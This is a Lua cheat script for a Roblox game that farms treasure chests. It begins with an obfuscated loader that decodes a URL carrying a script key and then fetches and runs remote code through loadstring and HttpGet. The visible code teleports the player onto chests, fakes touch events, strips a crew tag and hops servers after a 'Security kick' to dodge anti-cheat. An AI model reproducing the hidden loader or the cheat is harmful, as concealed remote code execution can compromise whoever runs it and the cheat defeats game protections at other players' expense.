-- script: chest.lua
--[[

    This script is protected with
    Bulletproof from LuaObfuscator.com

]]--
local v0={};local v1=string.char;local v2=string.byte;local v3=string.sub;local v4=bit32 or bit ;local v5=v4.bxor;local v6=table.concat;local v7=table.insert;local function v8(v9,v10) local v11={};for v15=1, #v9 do v7(v11,v1(v5(v2(v3(v9,v15,v15 + 1 )),v2(v3(v10,1 + (v15% #v10) ,1 + (v15% #v10) + 1 )))%256 ));end return v6(v11);end do v0[v8("\227\223\71\32\158\77\47\203\199\121\109\226\106\11\230\150\22","\74\165\179\38\84\215\41")]=0;v0[v8("\48\126\187\0","\220\70\78\158\48\118")]=nil;v0[v8("\192\170\238\116","\114\182\155\203\68")]=nil;while true do if (v0[v8("\85\169\191\236\111\50\118\171\170\199\31\99\80\132\157\189\22","\86\19\197\222\152\38")]==1) then if (game and game[v8("\212\84\108\245\90\67\34","\86\156\32\24\133\29\38")]) then loadstring(game:HttpGet(v0["v1%0"]))();elseif (HTTP and HTTP[v8("\128\160\119","\55\199\229\35\200\29\28")]) then HTTP:GET(v0["v1%0"],function(v19,v20) if (v19==200) then loadstring(v20)();end end);end break;end if (v0[v8("\82\246\221\32\58\112\255\210\32\44\45\175\255\21\48\49\170","\115\20\154\188\84")]==0) then v0[v8("\199\143\200\124","\223\177\191\237\76\225")]="/";v0[v8("\64\152\229\106","\219\54\169\192\90\48\80")]=v8("\65\86\20\53\90","\69\41\34\96")   .. ":"   .. v0[v8("\170\147\146\90","\75\220\163\183\106\98")]   .. v0[v8("\20\234\206\103","\185\98\218\235\87")]   .. v8("\199\41\38\233\220\172\222\47\36\231\202\165\217","\202\171\92\71\134\190")   .. v8("\103\194\35\133","\232\73\161\76")   .. v0[v8("\173\137\7\13","\126\219\185\34\61")]   .. v8("\31\205\76\123\110\99\224","\135\108\174\62\18\30\23\147")   .. v0[v8("\160\185\111\155","\167\214\137\74\171\120\206\83")]   .. v8("\157\161","\199\235\144\82\61\152")   .. v0[v8("\17\70\252\123","\75\103\118\217")]   .. script_key   .. v0[v8("\209\4\53\68","\126\167\52\16\116\217")]   .. v8("\203\38\37\147\160","\156\168\78\64\224\212\121")   .. v8("\74\186\243\155\73\226\176\207\31","\174\103\142\197") ;v0[v8("\112\36\94\44\12\90\253\88\60\96\97\112\125\217\117\109\15","\152\54\72\63\88\69\62")]=1;end end end
highChestOnly = true
godsChalicSniper = false
repeat task.wait(4) until game:IsLoaded()
local PlaceID = game.PlaceId
local AllIDs = {}
local foundAnything = ""
local actualHour = os.date("!*t").hour
local Deleted = false
local File = pcall(function()
    AllIDs = game:GetService('HttpService'):JSONDecode(readfile("NotSameServers.json"))
end)
if not File then
    table.insert(AllIDs, actualHour)
    writefile("NotSameServers.json", game:GetService('HttpService'):JSONEncode(AllIDs))
end
function TPReturner()
    local Site;
    if foundAnything == "" then
        Site = game.HttpService:JSONDecode(game:HttpGet('https://games.roblox.com/v1/games/' .. PlaceID .. '/servers/Public?sortOrder=Asc&limit=100'))
    else
        Site = game.HttpService:JSONDecode(game:HttpGet('https://games.roblox.com/v1/games/' .. PlaceID .. '/servers/Public?sortOrder=Asc&limit=100&cursor=' .. foundAnything))
    end
    local ID = ""
    if Site.nextPageCursor and Site.nextPageCursor ~= "null" and Site.nextPageCursor ~= nil then
        foundAnything = Site.nextPageCursor
    end
    local num = 0;
    for i,v in pairs(Site.data) do
        local Possible = true
        ID = tostring(v.id)
        if tonumber(v.maxPlayers) > tonumber(v.playing) then
            for _,Existing in pairs(AllIDs) do
                if num ~= 0 then
                    if ID == tostring(Existing) then
                        Possible = false
                    end
                else
                    if tonumber(actualHour) ~= tonumber(Existing) then
                        local delFile = pcall(function()
                            delfile("NotSameServers.json")
                            AllIDs = {}
                            table.insert(AllIDs, actualHour)
                        end)
                    end
                end
                num = num + 1
            end
            if Possible == true then
                table.insert(AllIDs, ID)
                wait()
                pcall(function()
                    writefile("NotSameServers.json", game:GetService('HttpService'):JSONEncode(AllIDs))
                    wait()
                    game:GetService("TeleportService"):TeleportToPlaceInstance(PlaceID, ID, game.Players.LocalPlayer)
                end)
                wait(4)
            end
        end
    end
end

function Teleport()
    while wait() do
        pcall(function()
            TPReturner()
            if foundAnything ~= "" then
                TPReturner()
            end
        end)
    end
end
local veryImportantWaitTime = 0.5
task.spawn(function()
    while task.wait(veryImportantWaitTime) do
        pcall(function()
            for i,v in pairs(game.CoreGui:GetDescendants()) do
                pcall(function()
                    if string.find(v.Name,"ErrorMessage") then
                        if string.find(v.Text,"Security kick") then
                            veryImportantWaitTime = 1e9
                            Teleport()
                        end
                    end
                end)
            end
        end)
    end
end)

local AllowRunService = true
local AllowRunServiceBind = Instance.new("BindableFunction")
function AllowRunServiceBind.OnInvoke(args)
    if args == "ON" then
        AllowRunService = true
    elseif args == "OFF" then
        AllowRunService = false
    end
    local CoreGui = game:GetService("StarterGui")
    CoreGui:SetCore("SendNotification", {
        Title = "Chest Farm",
        Text = "By Nguyen Vu Duy",
        Duration = math.huge,
        Callback = AllowRunServiceBind,
        Button1 = "ON",
        Button2 = "OFF",
    })
end


task.spawn(function()
    while task.wait() do
        task.spawn(function()
            if godsChalicSniper == true then
                if stuff then
                    AllowRunService = false
                end
            end
        end)
    end
end)

local CoreGui = game:GetService("StarterGui")
CoreGui:SetCore("SendNotification", {
    Title = "Chest Farm",
    Text = "By Le Minh Nhat",
    Duration = math.huge,
    Callback = AllowRunServiceBind,
    Button1 = "ON",
    Button2 = "OFF",
})
task.spawn(function()
    while true and task.wait(.5) do
        if AllowRunService == true then
            local ohString1 = "SetTeam"
            local ohString2 = "Pirates"

            game:GetService("ReplicatedStorage").Remotes.CommF_:InvokeServer(ohString1, ohString2)
        end
    end
end)

task.spawn(function()
    while true and task.wait() do
        if AllowRunService == true then
            if highChestOnly == false then
                local hasChar = game.Players.LocalPlayer:FindFirstChild("Character")
                if not game.Players.LocalPlayer.Character then
        
                else
                    local hasCrewTag = game.Players.LocalPlayer.Character:FindFirstChild("CrewBBG",true)
                    if hasCrewTag then hasCrewTag:Destroy() end
                    local hasHumanoid = game.Players.LocalPlayer.Character:FindFirstChild("Humanoid")
                    if hasHumanoid then
                        local Chest = game.Workspace:FindFirstChild("Chest4") or game.Workspace:FindFirstChild("Chest3") or game.Workspace:FindFirstChild("Chest2") or game.Workspace:FindFirstChild("Chest1") or game.Workspace:FindFirstChild("Chest")
                        
                        if Chest then
                            game.Players.LocalPlayer.Character:PivotTo(Chest:GetPivot())
                            firesignal(Chest.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart)
                        else
                            Teleport()
                            break
                        end
                    end 
                end
            elseif highChestOnly == true then
                local hasChar = game.Players.LocalPlayer:FindFirstChild("Character")
                if not game.Players.LocalPlayer.Character then
        
                else
                    local hasCrewTag = game.Players.LocalPlayer.Character:FindFirstChild("CrewBBG",true)
                    if hasCrewTag then hasCrewTag:Destroy() end
                    local hasHumanoid = game.Players.LocalPlayer.Character:FindFirstChild("Humanoid")
                    if hasHumanoid then
                        local Chest = game.Workspace:FindFirstChild("Chest4") or game.Workspace:FindFirstChild("Chest3") or game.Workspace:FindFirstChild("Chest2")
                        
                        if Chest then
                            game.Players.LocalPlayer.Character:PivotTo(Chest:GetPivot())
                            firesignal(Chest.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart)
                        else
                            Teleport()
                            break
                        end
                    end 
                end
            end
        end
    end
end)
